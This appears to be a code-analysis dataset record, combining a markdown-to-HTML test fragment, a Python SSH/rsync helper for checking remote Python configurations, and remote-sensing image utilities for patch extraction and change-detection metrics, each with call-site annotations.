</ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """\n )\n', (2021, 2196), False, 'import textwrap\n'), ((2332, 2450), 'textwrap.dedent', 'textwrap.dedent', (['""" 1. ordered item 1\n 2. ordered item 2\n\n - list item 1\n - list item 2\n """'], {}), '(\n """ 1. ordered item 1\n 2. ordered item 2\n\n - list item 1\n - list item 2\n """\n )\n', (2347, 2450), False, 'import textwrap\n'), ((2462, 2652), 'textwrap.dedent', 'textwrap.dedent', (['""" <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n """'], {}), '(\n """ <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n """\n )\n', (2477, 2652), False, 'import textwrap\n'), ((2821, 3019), 'textwrap.dedent', 'textwrap.dedent', (['""" # Title *italic* **bold**\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n """'], {}), '(\n """ # Title *italic* **bold**\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n """\n )\n', (2836, 3019), False, 'import textwrap\n'), ((3031, 3348), 'textwrap.dedent', 'textwrap.dedent', (['""" <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """'], {}), '(\n """ <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """\n )\n', (3046, 3348), False, 'import textwrap\n'), ((3561, 4001), 'textwrap.dedent', 'textwrap.dedent', (['""" # Title *italic* **bold**\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n # Title *italic* **bold**\n\n 1. ordered item 1\n 2. ordered item 2\n 3. ordered item 3\n 4. ordered item 4\n\n - list item 1\n - list item 2\n - list item 3\n - list item 4\n """'], {}), '(\n """ # Title *italic* **bold**\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n # Title *italic* **bold**\n\n 1. ordered item 1\n 2. ordered item 2\n 3. ordered item 3\n 4. ordered item 4\n\n - list item 1\n - list item 2\n - list item 3\n - list item 4\n """\n )\n', (3576, 4001), False, 'import textwrap\n'), ((4013, 4725), 'textwrap.dedent', 'textwrap.dedent', (['""" <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n <li>ordered item 3</li>\n <li>ordered item 4</li>\n </ol>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n <li>list item 3</li>\n <li>list item 4</li>\n </ul>\n """'], {}), '(\n """ <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n <li>ordered item 3</li>\n <li>ordered item 4</li>\n </ol>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n <li>list item 3</li>\n <li>list item 4</li>\n </ul>\n """\n )\n', (4028, 4725), False, 'import textwrap\n')]
|
from __future__ import print_function
import os
from ConfigParser import NoSectionError, NoOptionError
import paramiko
from artemis.config import get_artemis_config_value
from artemis.fileman.config_files import get_config_value
from artemis.remote.utils import get_ssh_connection
def check_config_file(ip_address,file_path=".artemisrc"):
'''
Makes sure all required fields are present in ~./artemisrc.
Also performs test for the different options if applicable
:param ip_address: The section to look for. Remote ip is assumed. Makes no sense for local ip.
:return:
'''
mandatory_options = ["username","python"]
artemisrc_path = os.path.expanduser("~/%s"%file_path)
for option in mandatory_options:
try:
get_artemis_config_value(section=ip_address,option=option)
except NoSectionError:
print("Section %s could not be found in %s. Please provide it." %(ip_address, artemisrc_path))
raise
except NoOptionError:
print("Section %s does not contain option %s. Please provide it in %s" %(ip_address, option, artemisrc_path))
raise
# optional_options = ["private_key"]
try:
private_key_path = get_artemis_config_value(section=ip_address,option="private_key")
assert os.path.isfile(private_key_path), "The path to the private_key for %s you specified in %s is not valid. You provided %s" %(ip_address, artemisrc_path, private_key_path)
except NoOptionError:
pass
# username & private key setup tests:
try:
get_ssh_connection(ip_address)
except paramiko.ssh_exception.AuthenticationException as e:
if "Authentication failed" in e.message:
print("An AuthenticationException is being raised. Make sure you have your private key set up correctly")
else:
print("An AuthenticationException is being raised. Did you specify the correct username for %s in %s? You provided the username %s"% (ip_address, artemisrc_path, get_artemis_config_value(section=ip_address,option="username")))
raise
except paramiko.ssh_exception.SSHException:
try:
private_key_path = get_artemis_config_value(section=ip_address,option="private_key")
print ("Something is wrong with the private_key you specified in %s for %s . You provided %s" % (artemisrc_path, ip_address, private_key_path))
raise
except NoOptionError:
private_key_path = os.path.join(os.path.expanduser("~"),".ssh/id_rsa")
print("You did not provide a private_key path in %s. The default path %s appears to be wrongly set up. "
"Please make sure you have correctly set up your private key for %s " %(artemisrc_path,private_key_path,ip_address))
#python tests:
python_path = get_artemis_config_value(section=ip_address,option="python")
command = "python -c 'import os; print(os.path.isfile(os.path.expanduser(\"%s\")))'"%python_path
ssh_conn = get_ssh_connection(ip_address)
_,stdout,stderr = ssh_conn.exec_command(command)
assert stdout.read().strip()=="True", "The provided path to the remote python installation on %s does not exist. You provided %s" %(ip_address, python_path)
command = "%s -c 'print(\"Success\")'" % python_path
_,stdout,stderr = ssh_conn.exec_command(command)
err = stderr.read().strip()
assert stdout.read().strip()=="Success" and not err, "The provided python path on %s does not seem to point to a python executable. " \
"You provided %s, which resulted in the following error on the remote machine: " %(ip_address, python_path, err)
def simple_rsync(local_path, remote_path, ip_address, verbose=False):
'''
This method synchronizes local_path and all subfolders with remote_path at the given address.
This method executes a system rsync call. This is not a general wrapper for rsync. The call is blocking.
:param local_path:
:param remote_path: Assumed to be relative to the home dir
:param ip_address:
:return:
'''
options = "-ah"
if verbose:
options += "v"
local_path = os.path.expanduser(local_path)
username = get_artemis_config_value(section=ip_address, option="username")
if remote_path.startswith("~"):
remote_path = remote_path[1:]
if remote_path.startswith(("/")):
remote_path = remote_path[1:]
# to_path = "%s@%s:/home/%s/%s" % (username, address, username, remote_path)
to_path = "%s@%s:~/%s" % (username, ip_address, remote_path)
return rsync(options, from_path=local_path, to_path=to_path)
def rsync(options, from_path, to_path):
'''
basic rsync wrapper
:param options:
:param from_path:
:param to_path:
:return:
'''
import subprocess
print ("Starting: rsync %s %s %s" % (options, from_path, to_path))
if not type(options) is list:
options = [options]
command = subprocess.Popen(["rsync"] + options + [from_path, to_path], stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1)
if "v" in options:
while True:
line = command.stdout.readline()
if line != '':
print (line.rstrip())
else:
break
err = command.stderr.read().strip()
if err:
msg = "rsync received messages on stderr. This might indicate that the command failed or, if you transferred to a remote server," \
" it might just be some message received by the remote server. \n" \
"This is because rsync automatically forwards all messages by the remote server to stderr. \n" \
"If you are confident that the call succeeded although stderr received messages, then catch the RuntimeError accordingly.\n " \
"The messages received are: \n %s" % err
raise RuntimeError(msg)
print("rsync finished")
return True
|
[
"subprocess.Popen",
"artemis.remote.utils.get_ssh_connection",
"artemis.config.get_artemis_config_value",
"os.path.isfile",
"os.path.expanduser"
] |
[((666, 704), 'os.path.expanduser', 'os.path.expanduser', (["('~/%s' % file_path)"], {}), "('~/%s' % file_path)\n", (684, 704), False, 'import os\n'), ((2841, 2902), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""python"""'}), "(section=ip_address, option='python')\n", (2865, 2902), False, 'from artemis.config import get_artemis_config_value\n'), ((3019, 3049), 'artemis.remote.utils.get_ssh_connection', 'get_ssh_connection', (['ip_address'], {}), '(ip_address)\n', (3037, 3049), False, 'from artemis.remote.utils import get_ssh_connection\n'), ((4211, 4241), 'os.path.expanduser', 'os.path.expanduser', (['local_path'], {}), '(local_path)\n', (4229, 4241), False, 'import os\n'), ((4257, 4320), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""username"""'}), "(section=ip_address, option='username')\n", (4281, 4320), False, 'from artemis.config import get_artemis_config_value\n'), ((5008, 5132), 'subprocess.Popen', 'subprocess.Popen', (["(['rsync'] + options + [from_path, to_path])"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'bufsize': '(1)'}), "(['rsync'] + options + [from_path, to_path], stdout=\n subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1)\n", (5024, 5132), False, 'import subprocess\n'), ((1228, 1294), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""private_key"""'}), "(section=ip_address, option='private_key')\n", (1252, 1294), False, 'from artemis.config import get_artemis_config_value\n'), ((1309, 1341), 'os.path.isfile', 'os.path.isfile', (['private_key_path'], {}), '(private_key_path)\n', (1323, 1341), False, 'import os\n'), ((1576, 1606), 'artemis.remote.utils.get_ssh_connection', 'get_ssh_connection', (['ip_address'], {}), '(ip_address)\n', (1594, 1606), False, 'from artemis.remote.utils import get_ssh_connection\n'), ((765, 824), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': 'option'}), '(section=ip_address, option=option)\n', (789, 824), False, 'from artemis.config import get_artemis_config_value\n'), ((2197, 2263), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""private_key"""'}), "(section=ip_address, option='private_key')\n", (2221, 2263), False, 'from artemis.config import get_artemis_config_value\n'), ((2511, 2534), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (2529, 2534), False, 'import os\n'), ((2026, 2089), 'artemis.config.get_artemis_config_value', 'get_artemis_config_value', ([], {'section': 'ip_address', 'option': '"""username"""'}), "(section=ip_address, option='username')\n", (2050, 2089), False, 'from artemis.config import get_artemis_config_value\n')]
|
import os
import numpy as np
import scipy.io as sio
import skimage as sk
#from osgeo import gdal
from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix
import sklearn
import warnings
def save_as_mat(data, name):
sio.savemat(name, {name: data})
def Read_TIFF_Image(Path):
img =[]
#gdal_header = gdal.Open(Path)
#img = gdal_header.ReadAsArray()
return img
def Compute_NDVI_Band(Image):
Image = Image.astype(np.float32)
nir_band = Image[4, :, :]
red_band = Image[3, :, :]
ndvi = np.zeros((Image.shape[1] , Image.shape[2] , 1))
ndvi[ : , : , 0] = np.divide((nir_band-red_band),(nir_band+red_band))
return ndvi
def compute_metrics(true_labels, predicted_labels):
conf_mat = confusion_matrix(true_labels, predicted_labels)
accuracy = 100*accuracy_score(true_labels, predicted_labels)
with warnings.catch_warnings():
warnings.filterwarnings("error")
try:
precision = 100*precision_score(true_labels, predicted_labels)
except Warning as e:
if isinstance(e, sklearn.exceptions.UndefinedMetricWarning): precision = np.nan
else: raise e
try:
recall = 100*recall_score(true_labels, predicted_labels)
except Warning as e:
if isinstance(e, sklearn.exceptions.UndefinedMetricWarning): recall = np.nan
else: raise e
try:
f1score = 100*f1_score(true_labels, predicted_labels)
except Warning as e:
if isinstance(e, sklearn.exceptions.UndefinedMetricWarning): f1score = np.nan
else: raise e
return accuracy, f1score, recall, precision, conf_mat
def Data_Augmentation_Definition(corners_coordinates):
num_sample = np.size(corners_coordinates , 0)
data_cols = np.size(corners_coordinates , 1)
corners_coordinates_augmented = np.zeros((3 * num_sample, data_cols + 1))
counter = 0
for s in range(num_sample):
corners_coordinates_0 = corners_coordinates[s]
# central_pixels_coor_augmented[counter, 0 : 2] = central_pixels_coor_x_0
# central_pixels_coor_augmented[counter, 2] = 0
# labels_augmented[counter, :] = labels_y_0
# counter += 1
corners_coordinates_augmented[counter, 0 : 4] = corners_coordinates_0
corners_coordinates_augmented[counter, 4] = 1
counter += 1
corners_coordinates_augmented[counter, 0 : 4] = corners_coordinates_0
corners_coordinates_augmented[counter, 4] = 2
counter += 1
corners_coordinates_augmented[counter, 0 : 4] = corners_coordinates_0
corners_coordinates_augmented[counter, 4] = 3
counter += 1
return corners_coordinates_augmented
def Data_Augmentation_Execution(data, transformation_indexs):
data_rows = np.size(data , 1)
data_cols = np.size(data , 2)
data_depth = np.size(data , 3)
num_sample = np.size(data , 0)
data_transformed = np.zeros((num_sample, data_rows, data_cols, data_depth))
counter = 0
for s in range(num_sample):
data_x_0 = data[s, :, :, :]
transformation_index = transformation_indexs[s]
#Rotating
if transformation_index == 0:
data_transformed[s, :, :, :] = data_x_0
if transformation_index == 1:
data_transformed[s, :, :, :] = np.rot90(data_x_0)
if transformation_index == 2:
data_transformed[s, :, :, :] = np.flip(data_x_0, 0)
if transformation_index == 3:
data_transformed[s, :, :, :] = np.flip(data_x_0, 1)
return data_transformed
def Patch_Extraction(data, corners_coordinates, patch_size):
data_depth = np.size(data, 2)
num_samp = np.size(corners_coordinates , 0)
patches_cointainer = np.zeros((num_samp, patch_size, patch_size, data_depth))
for i in range(num_samp):
patches_cointainer[i, :, :, :] = data[int(corners_coordinates[i , 0]) : int(corners_coordinates[i , 2]) , int(corners_coordinates[i , 1]) : int(corners_coordinates[i , 3]) , :]
return patches_cointainer
def mask_creation(mask_row, mask_col, num_patch_row, num_patch_col, Train_tiles, Valid_tiles, Undesired_tiles):
train_index = 1
teste_index = 2
valid_index = 3
undesired_index = 4
patch_dim_row = mask_row//num_patch_row
patch_dim_col = mask_col//num_patch_col
mask_array = 2 * np.ones((mask_row, mask_col))
train_mask = np.ones((patch_dim_row, patch_dim_col))
valid_mask = 3 * np.ones((patch_dim_row, patch_dim_col))
undesired_mask = 4 * np.ones((patch_dim_row, patch_dim_col))
counter_r = 1
counter = 1
for i in range(0, mask_row, patch_dim_row):
for j in range(0 , mask_col, patch_dim_col):
train = np.size(np.where(Train_tiles == counter),1)
valid = np.size(np.where(Valid_tiles == counter),1)
undesired = np.size(np.where(Undesired_tiles == counter), 1)
if train == 1:
mask_array[i : i + patch_dim_row, j : j + patch_dim_col] = train_mask
if counter_r == num_patch_row:
mask_array[i : mask_row, j : j + patch_dim_col] = np.ones((mask_row - i, patch_dim_col))
if valid == 1:
mask_array[i : i + patch_dim_row, j : j + patch_dim_col] = valid_mask
if counter_r == num_patch_row:
mask_array[i : mask_row, j : j + patch_dim_col] = 3 * np.ones((mask_row - i, patch_dim_col))
if undesired == 1:
mask_array[i : i + patch_dim_row, j : j + patch_dim_col] = undesired_mask
if counter_r == num_patch_row:
mask_array[i : mask_row, j : j + patch_dim_col] = 4 * np.ones((mask_row - i, patch_dim_col))
counter += 1
counter_r += 1
return mask_array
def Corner_Coordinates_Definition_Training(mask, last_reference, actual_reference, patch_dimension,
overlap_percent, percent_of_positive_pixels_in_actual_reference):
mask_rows = np.size(mask, 0)
mask_cols = np.size(mask, 1)
# Correcting the references for convenience
last_reference[actual_reference == 2] = 1
actual_reference[actual_reference == 2] = 0
# Computing the overlaps and other things to extract patches
overlap = round(patch_dimension * overlap_percent)
overlap -= overlap % 2
stride = patch_dimension - overlap
step_row = (stride - mask_rows % stride) % stride
step_col = (stride - mask_cols % stride) % stride
k1, k2 = (mask_rows + step_row)//stride, (mask_cols + step_col)//stride
#Taking the initial coordinates
coordinates = np.zeros((k1 * k2 , 4))
counter = 0
for i in range(k1):
for j in range(k2):
coordinates[counter, 0] = i * stride
coordinates[counter, 1] = j * stride
coordinates[counter, 2] = i * stride + patch_dimension
coordinates[counter, 3] = j * stride + patch_dimension
counter += 1
pad_tuple = ((overlap//2, overlap//2 + step_row) , (overlap//2, overlap//2 + step_col))
# Making the padding procedure
# into the mask
mask_padded = np.pad(mask, pad_tuple, mode='symmetric')
# into the past deforestation reference
last_reference_padded = np.pad(last_reference, pad_tuple, mode='symmetric')
# into the actual deforestation reference
actual_reference_padded = np.pad(actual_reference, pad_tuple, mode='symmetric')
#Initializing the central pixels coordinates containers
corners_coordinates_tr = []
corners_coordinates_vl = []
class_weights = []
pad_tuple = ((overlap//2, overlap//2 + step_row) , (overlap//2, overlap//2 + step_col), (0 , 0))
# Refine the central pixels coordinates
counter_tr = 0
counter_vl = 0
positive_percent_accumulated = 0
for i in range(np.size(coordinates , 0)):
mask_reference_value = mask_padded[int(coordinates[i , 0]) : int(coordinates[i , 2]) , int(coordinates[i , 1]) : int(coordinates[i , 3])]
last_reference_value = last_reference_padded[int(coordinates[i , 0]) : int(coordinates[i , 2]) , int(coordinates[i , 1]) : int(coordinates[i , 3])]
actual_reference_value = actual_reference_padded[int(coordinates[i , 0]) : int(coordinates[i , 2]) , int(coordinates[i , 1]) : int(coordinates[i , 3])]
# Looking for a test pixels in the mask reference
test_pixels_indexs = np.transpose(np.array(np.where(mask_reference_value == 2)))
if np.size(test_pixels_indexs,0) == 0:
number_positives_actual_reference = np.sum(actual_reference_value)
percent_of_positive_pixels_in_actual_reference_i = (number_positives_actual_reference/(patch_dimension * patch_dimension)) * 100
if percent_of_positive_pixels_in_actual_reference_i > percent_of_positive_pixels_in_actual_reference:
positive_percent_accumulated += percent_of_positive_pixels_in_actual_reference_i
train_pixels_indexs = np.transpose(np.array(np.where(mask_reference_value == 1)))
percent_of_training_pixels = (train_pixels_indexs.shape[0]/(patch_dimension * patch_dimension)) * 100
if percent_of_training_pixels > 70:
corners_coordinates_tr.append(coordinates[i , :])
counter_tr += 1
if percent_of_positive_pixels_in_actual_reference_i > 3:
valid_pixels_indexs = np.transpose(np.array(np.where(mask_reference_value == 3)))
percent_of_validation_pixels = (valid_pixels_indexs.shape[0]/(patch_dimension * patch_dimension)) * 100
if percent_of_validation_pixels > 70:
corners_coordinates_vl.append(coordinates[i , :])
mean_positive_percent = positive_percent_accumulated/counter_tr
class_weights.append(mean_positive_percent/100)
class_weights.append(1 - (mean_positive_percent/100))
return corners_coordinates_tr, corners_coordinates_vl, last_reference_padded, actual_reference_padded, pad_tuple, class_weights
def Corner_Coordinates_Definition_Testing(mask, patch_dimension, overlap_percent):
mask_rows = np.size(mask, 0)
mask_cols = np.size(mask, 1)
# Computing the overlaps and other things to extract patches
overlap = round(patch_dimension * overlap_percent)
overlap -= overlap % 2
stride = patch_dimension - overlap
step_row = (stride - mask_rows % stride) % stride
step_col = (stride - mask_cols % stride) % stride
k1, k2 = (mask_rows + step_row)//stride, (mask_cols + step_col)//stride
#Taking the initial coordinates
coordinates = np.zeros((k1 * k2 , 4))
counter = 0
for i in range(k1):
for j in range(k2):
coordinates[counter, 0] = i * stride
coordinates[counter, 1] = j * stride
coordinates[counter, 2] = i * stride + patch_dimension
coordinates[counter, 3] = j * stride + patch_dimension
counter += 1
pad_tuple = ((overlap//2, overlap//2 + step_row) , (overlap//2, overlap//2 + step_col), (0 , 0))
return coordinates, pad_tuple, k1, k2, step_row, step_col, stride, overlap
def Classification_Maps(Predicted_labels, True_labels, central_pixels_coordinates, hit_map):
Classification_Map = np.zeros((hit_map.shape[0], hit_map.shape[1], 3))
TP_counter = 0
FP_counter = 0
for i in range(central_pixels_coordinates.shape[0]):
T_label = True_labels[i]
P_label = Predicted_labels[i]
if T_label == 1:
if P_label == T_label:
TP_counter += 1
#True positve
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),0] = 0
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),1] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),2] = 0
else:
#False Negative
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),0] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),1] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),2] = 0
if T_label == 0:
if P_label == T_label:
#True Negative
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),0] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),1] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),2] = 255
else:
#False Positive
FP_counter += 1
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),0] = 255
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),1] = 0
Classification_Map[int(central_pixels_coordinates[i , 0]),int(central_pixels_coordinates[i , 1]),2] = 0
return Classification_Map, TP_counter, FP_counter
def plot_embedding(X, y, d, title=None):
"""Plot an embedding X with the class label y colored by the domain d."""
x_min, x_max = np.min(X, 0), np.max(X, 0)
X = (X - x_min) / (x_max - x_min)
# Plot colors numbers
plt.figure(figsize=(10,10))
ax = plt.subplot(111)
for i in range(X.shape[0]):
# plot colored number
plt.text(X[i, 0], X[i, 1], str(y[i]),
color=plt.cm.bwr(d[i] / 1.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([]), plt.yticks([])
if title is not None:
plt.title(title)
|
[
"numpy.sum",
"sklearn.metrics.accuracy_score",
"numpy.ones",
"sklearn.metrics.f1_score",
"numpy.rot90",
"numpy.pad",
"numpy.max",
"warnings.catch_warnings",
"numpy.divide",
"numpy.size",
"sklearn.metrics.recall_score",
"numpy.min",
"numpy.flip",
"warnings.filterwarnings",
"numpy.zeros",
"scipy.io.savemat",
"numpy.where",
"sklearn.metrics.precision_score",
"sklearn.metrics.confusion_matrix"
] |
[((265, 296), 'scipy.io.savemat', 'sio.savemat', (['name', '{name: data}'], {}), '(name, {name: data})\n', (276, 296), True, 'import scipy.io as sio\n'), ((563, 608), 'numpy.zeros', 'np.zeros', (['(Image.shape[1], Image.shape[2], 1)'], {}), '((Image.shape[1], Image.shape[2], 1))\n', (571, 608), True, 'import numpy as np\n'), ((634, 685), 'numpy.divide', 'np.divide', (['(nir_band - red_band)', '(nir_band + red_band)'], {}), '(nir_band - red_band, nir_band + red_band)\n', (643, 685), True, 'import numpy as np\n'), ((769, 816), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (785, 816), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((1775, 1806), 'numpy.size', 'np.size', (['corners_coordinates', '(0)'], {}), '(corners_coordinates, 0)\n', (1782, 1806), True, 'import numpy as np\n'), ((1824, 1855), 'numpy.size', 'np.size', (['corners_coordinates', '(1)'], {}), '(corners_coordinates, 1)\n', (1831, 1855), True, 'import numpy as np\n'), ((1902, 1943), 'numpy.zeros', 'np.zeros', (['(3 * num_sample, data_cols + 1)'], {}), '((3 * num_sample, data_cols + 1))\n', (1910, 1943), True, 'import numpy as np\n'), ((2880, 2896), 'numpy.size', 'np.size', (['data', '(1)'], {}), '(data, 1)\n', (2887, 2896), True, 'import numpy as np\n'), ((2914, 2930), 'numpy.size', 'np.size', (['data', '(2)'], {}), '(data, 2)\n', (2921, 2930), True, 'import numpy as np\n'), ((2949, 2965), 'numpy.size', 'np.size', (['data', '(3)'], {}), '(data, 3)\n', (2956, 2965), True, 'import numpy as np\n'), ((2984, 3000), 'numpy.size', 'np.size', (['data', '(0)'], {}), '(data, 0)\n', (2991, 3000), True, 'import numpy as np\n'), ((3030, 3086), 'numpy.zeros', 'np.zeros', (['(num_sample, data_rows, data_cols, data_depth)'], {}), '((num_sample, data_rows, data_cols, data_depth))\n', (3038, 3086), True, 'import numpy as np\n'), ((3774, 3790), 'numpy.size', 'np.size', (['data', '(2)'], {}), '(data, 2)\n', (3781, 3790), True, 'import numpy as np\n'), ((3806, 3837), 'numpy.size', 'np.size', (['corners_coordinates', '(0)'], {}), '(corners_coordinates, 0)\n', (3813, 3837), True, 'import numpy as np\n'), ((3864, 3920), 'numpy.zeros', 'np.zeros', (['(num_samp, patch_size, patch_size, data_depth)'], {}), '((num_samp, patch_size, patch_size, data_depth))\n', (3872, 3920), True, 'import numpy as np\n'), ((4553, 4592), 'numpy.ones', 'np.ones', (['(patch_dim_row, patch_dim_col)'], {}), '((patch_dim_row, patch_dim_col))\n', (4560, 4592), True, 'import numpy as np\n'), ((6212, 6228), 'numpy.size', 'np.size', (['mask', '(0)'], {}), '(mask, 0)\n', (6219, 6228), True, 'import numpy as np\n'), ((6245, 6261), 'numpy.size', 'np.size', (['mask', '(1)'], {}), '(mask, 1)\n', (6252, 6261), True, 'import numpy as np\n'), ((6843, 6865), 'numpy.zeros', 'np.zeros', (['(k1 * k2, 4)'], {}), '((k1 * k2, 4))\n', (6851, 6865), True, 'import numpy as np\n'), ((7363, 7404), 'numpy.pad', 'np.pad', (['mask', 'pad_tuple'], {'mode': '"""symmetric"""'}), "(mask, pad_tuple, mode='symmetric')\n", (7369, 7404), True, 'import numpy as np\n'), ((7477, 7528), 'numpy.pad', 'np.pad', (['last_reference', 'pad_tuple'], {'mode': '"""symmetric"""'}), "(last_reference, pad_tuple, mode='symmetric')\n", (7483, 7528), True, 'import numpy as np\n'), ((7605, 7658), 'numpy.pad', 'np.pad', (['actual_reference', 'pad_tuple'], {'mode': '"""symmetric"""'}), "(actual_reference, pad_tuple, mode='symmetric')\n", (7611, 7658), True, 'import numpy as np\n'), ((10385, 10401), 'numpy.size', 'np.size', (['mask', '(0)'], {}), '(mask, 0)\n', (10392, 10401), True, 'import numpy as np\n'), ((10418, 10434), 'numpy.size', 'np.size', (['mask', '(1)'], {}), '(mask, 1)\n', (10425, 10434), True, 'import numpy as np\n'), ((10874, 10896), 'numpy.zeros', 'np.zeros', (['(k1 * k2, 4)'], {}), '((k1 * k2, 4))\n', (10882, 10896), True, 'import numpy as np\n'), ((11541, 11590), 'numpy.zeros', 'np.zeros', (['(hit_map.shape[0], hit_map.shape[1], 3)'], {}), '((hit_map.shape[0], hit_map.shape[1], 3))\n', (11549, 11590), True, 'import numpy as np\n'), ((836, 881), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (850, 881), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((891, 916), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {}), '()\n', (914, 916), False, 'import warnings\n'), ((926, 958), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""error"""'], {}), "('error')\n", (949, 958), False, 'import warnings\n'), ((4501, 4530), 'numpy.ones', 'np.ones', (['(mask_row, mask_col)'], {}), '((mask_row, mask_col))\n', (4508, 4530), True, 'import numpy as np\n'), ((4614, 4653), 'numpy.ones', 'np.ones', (['(patch_dim_row, patch_dim_col)'], {}), '((patch_dim_row, patch_dim_col))\n', (4621, 4653), True, 'import numpy as np\n'), ((4679, 4718), 'numpy.ones', 'np.ones', (['(patch_dim_row, patch_dim_col)'], {}), '((patch_dim_row, patch_dim_col))\n', (4686, 4718), True, 'import numpy as np\n'), ((8054, 8077), 'numpy.size', 'np.size', (['coordinates', '(0)'], {}), '(coordinates, 0)\n', (8061, 8077), True, 'import numpy as np\n'), ((13777, 13789), 'numpy.min', 'np.min', (['X', '(0)'], {}), '(X, 0)\n', (13783, 13789), True, 'import numpy as np\n'), ((13791, 13803), 'numpy.max', 'np.max', (['X', '(0)'], {}), '(X, 0)\n', (13797, 13803), True, 'import numpy as np\n'), ((3416, 3434), 'numpy.rot90', 'np.rot90', (['data_x_0'], {}), '(data_x_0)\n', (3424, 3434), True, 'import numpy as np\n'), ((3516, 3536), 'numpy.flip', 'np.flip', (['data_x_0', '(0)'], {}), '(data_x_0, 0)\n', (3523, 3536), True, 'import numpy as np\n'), ((3618, 3638), 'numpy.flip', 'np.flip', (['data_x_0', '(1)'], {}), '(data_x_0, 1)\n', (3625, 3638), True, 'import numpy as np\n'), ((8701, 8731), 'numpy.size', 'np.size', (['test_pixels_indexs', '(0)'], {}), '(test_pixels_indexs, 0)\n', (8708, 8731), True, 'import numpy as np\n'), ((8785, 8815), 'numpy.sum', 'np.sum', (['actual_reference_value'], {}), '(actual_reference_value)\n', (8791, 8815), True, 'import numpy as np\n'), ((1000, 1046), 'sklearn.metrics.precision_score', 